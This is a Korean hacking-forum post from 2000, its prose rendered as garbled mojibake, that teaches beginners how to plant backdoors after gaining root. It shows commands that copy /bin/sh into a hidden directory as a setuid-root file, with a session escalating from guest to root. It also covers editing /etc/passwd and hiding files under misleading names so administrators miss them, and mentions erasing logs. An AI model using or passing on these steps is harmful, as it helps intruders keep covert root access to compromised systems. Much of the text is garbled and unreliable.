Hacking °ü·Ã °Ô½ÃÆÇ |
---|
2000/08/06(20:34) from 203.254.154.69 | |
ÀÛ¼ºÀÚ : °ÁÙ±â (jkkang65@hanmail.net) | Á¶È¸¼ö : 3121 , ÁÙ¼ö : 53 |
¹éµµ¾î¶õ? |
---|
¹éµµ¾î(Backdoor)¶õ? ¹éµµ¾î´Â ÇØÄ¿°¡ ÇØÅ·À» ÇÏ°í ³ª¼ ´ÙÀ½¹ø¿¡ ¼ö¿ùÇÑ ÇØÅ·À» À§ÇØ ¸¸µé¾î µÎ´Â µÞ±¸¸Û À» ¸»ÇÕ´Ï´Ù. ¹éµµ¾î¸¦ ¸¸µå´Â ¹æ¹ýÀº ±²ÀåÈ÷ ´Ù¾çÇÕ´Ï´Ù. Ãʺ¸ºÐµéÀ» À§ÇÑ °¡Àå ±â º»ÀûÀÎ ¹éµµ¾î ¸¸µå´Â ¹ýÀ» ¾Ë·Áµå¸®°Ú½À´Ï´Ù. ¹éµµ¾î ¼³Ä¡ I ÀÏ´Ü ¿©·¯ºÐµéÀÌ ¾î¶² ¹æ¹ýÀ» ¾²´øÁö, (´ëºÎºÐ ¹öÆÛ ¿À¹öÇ÷οì ÀÌ¿ë) ·çÆ®¸¦ ¶¢´Ï ´Ù. ·çÆ®¸¦ ¶¤´Ù¸é ¿©·¯ºÐµéÀº ¸¹Àº ÀÏÀ» ÇØ¾ß ÇÕ´Ï´Ù. ·Î±×¸¦ Áö¿ì°í ´ÙÀ½¹ø Á¢¼Ó À» À§ÇØ ¿©·¯ °¡Áö ¹éµµ¾î¸¦ ¸¸µé¾î µÎ¾î¾ß °ÚÁÒ. ±×Áß °¡Àå ½¬¿î ¹ýÀ» ·çÆ®½©À» º¹»çÇØ µÎ´Â °Çµ¥, ÁÖÀÇÇÒ Á¡Àº ·çÆ®½©À» º¹»ç ÇÏ´Â µð·ºÅ丮°¡ ¾îµå¹Î¿¡°Ô Àß µéÅ°Áö ¾ÊÀ» ¸¸ÇÑ °÷À̾î¾ß ÇÒ °ÍÀÌ°í, ÆÄÀÏ¸íµµ ±×·²½Î ÇÏ°Ô ¹Ù²Ù¾î ³õ¾Æ¾ß ÇÕ´Ï´Ù. ±×·³ ¿¹¸¦ µé¾î º¸¿©µå¸®°Ú½À´Ï´Ù. # whoami root # cd /tmp ; mkdir .temp ; cp /bin/sh /tmp/.temp/.sync ; cd /tmp/.temp ; chmod 4755 .sync (À§ÀÇ ¸í·ÉÀº ÇÑÁÙ¿¡ ¸ðµÎ Ç¥ÇöÇÑ °ÍÀÔ´Ï´Ù. ¿©·¯ºÐÀº " ; " ´ë½Å ±×³É ¿©·¯ÁÙ·Î ¾² ¼Åµµ µË´Ï´Ù) # su guest # whoami guest # /tmp/.temp/.sync # whoami root ÀÌ·± ½ÄÀ¸·Î µÇ´Â °Ì´Ï´Ù. ¹éµµ¾î¸¦ ¸¸µé ¶§´Â ÆÄÀϸíÀ» ¸í·É¾î¿Í °°°Ô ÇÏ´Â °Íµµ ÁÁ À¸¸ç, µð·ºÅ丮´Â À§¿¡ ÀÖ´Â °Íº¸´Ù ´õ º¹ÀâÇϰųª, /usr/bin °°Àº °÷¿¡ µÎ¾îµµ ÁÁ ½À´Ï´Ù. ¹¹ /dev/tty??? ¶ó±¸ Çؼ ¼û°Ü³õ´Â °Íµµ ÁÁ±¸¿ä. ±×ÈÄ¿¡ ·çÆ®°¡ ÇÊ¿äÇÒ ¶§¸¶´Ù ±× ÆÄÀÏÀ» ½ÇÇà½ÃÅ°¸é µÇÁÒ. ¹éµµ¾î ¼³Ä¡ II ·çÆ®½©À» ÀÌ¿ëÇÑ ¹éµµ¾î ¸»°í ´õ °£´ÜÇÑ ¹éµµ¾î´Â passwd ÆÄÀÏÀ» ¼öÁ¤ ÇÏ´Â °ÍÀÔ´Ï ´Ù. ÀÏ´Ü ·çÆ®°¡ µÇ°í ³ª¸é passwd ÆÄÀÏÀ» ¼öÁ¤ ÇÕ´Ï´Ù. joe³ª vi, pico °°Àº ¿¡ µðÅ͸¦ ÀÌ¿ëÇÏ¿©, ¼öÁ¤ ÇÕ´Ï´Ù. Ãʺ¸ºÐµé¿¡°Ô vi´Â Á» ÈûµéÅ×´Ï pico ·Î ¼³¸íÇÏ°Ú½À ´Ï´Ù. # whoami root # pico /etc/passwd . memoon:*:909:100:nothing:/home/memoon:/bin/bash . ÀÌ·± ½ÄÀ¸·Î ³ª¿À¸é Æнº¿öµå´Â µÎ ¹ø° ÅÇÀÎ " * "ÀÔ´Ï´Ù. ±×·¯¹Ç·Î ·çÆ®·Î µé¾î°¡´Â°Ì´Ï´Ù. |